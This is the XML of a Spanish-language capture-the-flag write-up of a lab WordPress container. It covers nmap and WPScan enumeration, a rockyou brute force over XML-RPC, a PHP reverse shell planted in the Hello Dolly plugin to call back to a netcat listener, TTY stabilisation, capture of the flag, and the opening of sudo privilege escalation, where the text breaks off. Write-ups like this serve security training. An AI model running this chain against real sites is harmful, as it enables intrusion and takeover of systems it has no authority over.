        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 2. Verificación de conectividad (ping) contra 172.17.0.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0F766E" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Reconocimiento (Nmap)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se ejecutó un escaneo completo de puertos TCP para identificar los servicios expuestos por el objetivo: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nmap -p- --open 172.17.0.2</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191000" cy="1771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771650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 3. Escaneo de puertos con Nmap — único puerto abierto: 80/tcp (http).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El resultado mostró un único puerto abierto, el 80/tcp, correspondiente a un servicio HTTP. Al acceder desde el navegador se confirmó la presencia de un sitio construido con WordPress (“Mi sitio WordPress”):</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667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i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 4. Página principal del sitio WordPress alojado en el objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0F766E" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Enumeración de la aplicación web (WPScan)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dado que el único vector disponible era la aplicación WordPress, se utilizó WPScan para enumerar usuarios, temas y plugins instalados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Enumeración de usuarios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wpscan --url http://172.17.0.2/ --enumerate u</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000500" cy="2171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71700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 5. Inicio del escaneo con WPScan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La enumeración identificó un único usuario, “admin”, detectado a través del generador RSS (detección pasiva) y confirmado mediante fuerza bruta de IDs de autor:</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381500" cy="1247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247775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 6. Usuario “admin” identificado por WPScan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Enumeración agresiva (usuarios, plugins y temas)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación se ejecutó un escaneo en modo agresivo para enumerar de forma más exhaustiva usuarios, plugins y temas instalados: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wpscan --url http://172.17.0.2 -e u,p,t --detection-mode aggressive</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00050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76450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 7. Escaneo agresivo de WPScan contra el objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Entre los hallazgos destaca el tema “twentytwentyfive” con listado de directorios habilitado en su ruta (wp-content/themes/twentytwentyfive/), y la confirmación del usuario “admin” mediante fuerza bruta agresiva de patrones de autor:</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762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6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 8. Tema con listado de directorios habilitado y usuario “admin” confirmado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0F766E" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Explotación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Ataque de fuerza bruta contra XML-RPC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Con el nombre de usuario “admin” confirmado, se realizó un ataque de fuerza bruta contra el endpoint XML-RPC de WordPress utilizando el diccionario rockyou.txt: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wpscan --url http://172.17.0.2 -U admin -P /usr/share/wordlists/rockyou.txt \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    --password-attack xmlrpc -t 64</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1590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6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 9. Ataque de fuerza bruta contra el endpoint XML-RPC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El ataque tuvo éxito, revelando una combinación de credenciales válida y extremadamente débil:</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3429000" cy="628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628650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 10. Credenciales válidas encontradas: admin / admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Acceso al panel de administración</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Con las credenciales obtenidas se accedió al formulario de inicio de sesión de WordPress (wp-login.php) y se ingresó exitosamente al panel de administración:</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3429000" cy="1924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1924050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 11. Formulario de autenticación de WordPress.</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305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305050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 12. Sesión iniciada como “admin” (indicador “Howdy, admin”).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 Ejecución remota de código vía editor de plugins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress permite, a cuentas con privilegios de administrador, editar directamente el código fuente de plugins y temas desde el panel (Herramientas → Editor de archivos de plugin). Esta funcionalidad nativa se utilizó para lograr ejecución remota de código: se generó una reverse shell en PHP basada en la plantilla de pentestmonkey (usando revshells.com) apuntando a la dirección del atacante (172.17.0.1) en el puerto 9001, y se sobrescribió con ella el archivo hello.php del plugin “Hello Dolly”, que se encontraba inactivo:</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1800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800225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 13. Reverse shell en PHP insertada en hello.php a través del Editor de Archivos de Plugin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Antes de activar el plugin, se puso en escucha un listener en el equipo atacante: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rlwrap nc -lvnp 9001</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">listening on [any] 9001 ...</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3048000" cy="762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762000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 14. Listener de Netcat a la espera de conexión.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Finalmente, se activó el plugin “Hello Dolly” desde la sección Plugins del panel, lo que provocó que WordPress cargara e interpretara hello.php, ejecutando la reverse shell:</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190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9075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 15. Activación del plugin “Hello Dolly” para disparar la ejecución del código malicioso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0F766E" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Post-explotación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Shell obtenida</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La activación del plugin disparó la conexión de vuelta hacia el listener, obteniendo una shell interactiva como el usuario del servicio web:</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857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857250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 16. Conexión reversa recibida — usuario www-data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La salida confirma que el objetivo corre sobre una base Kali Linux en contenedor Docker (hostname 95f7ade90a0b) y que el usuario www-data pertenece además al grupo mysql, lo cual podría indicar acceso potencial al socket o archivos de configuración de la base de datos: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uid=33(www-data) gid=33(www-data) groups=33(www-data),101(mysql)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 Estabilización de la terminal (TTY)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para disponer de una shell completamente interactiva (autocompletado, atajos, control de trabajos), se estabilizó la TTY con la técnica habitual de “STTY raw”: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script /dev/null -c bash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Ctrl+Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">$ stty raw -echo; fg</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">$ reset</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">$ export TERM=xterm</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">$ export SHELL=/bin/bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En una terminal local adicional se consultó el tamaño de la ventana (stty size) para igualar filas y columnas de la shell remota, completando así la estabilización.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 Enumeración del sistema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Con la shell ya estable se exploró el sistema de archivos en busca de información sensible. El directorio /home contenía una carpeta perteneciente al usuario local “bobby” y un archivo flag.txt, propiedad de www-data, legible por el usuario actual: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 ls -la /home</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">drwxr-xr-x 2 bobby    bobby    4096 Feb 28  2026 bobby</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">-rw-r--r-- 1 www-data www-data   24 Feb 17  2026 flag.txt</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www-data@95f7ade90a0b:/home$ cat flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">LNDSG98DSFG7D8SGY8SDFG9</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381500" cy="2457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457450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 17. Flag capturada en /home/flag.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0F766E" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Flag obtenida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F0FDFA" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0F766E"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">LNDSG98DSFG7D8SGY8SDFG9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0F766E" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Escalada de privilegios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1 Enumeración de privilegios sudo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Con la shell de www-data ya estabilizada, se consultaron los privilegios sudo disponibles para el usuario actual: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www-data@95f7ade90a0b:/home$ sudo -l</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Matching Defaults entries for www-data on 95f7ade90a0b:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    env_reset, mail_badpass,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin</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User www-data may run the following commands on 95f7ade90a0b:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    (bobby) NOPASSWD: /usr/bin/python3</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46196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4619625"/>
                    </a:xfrm>
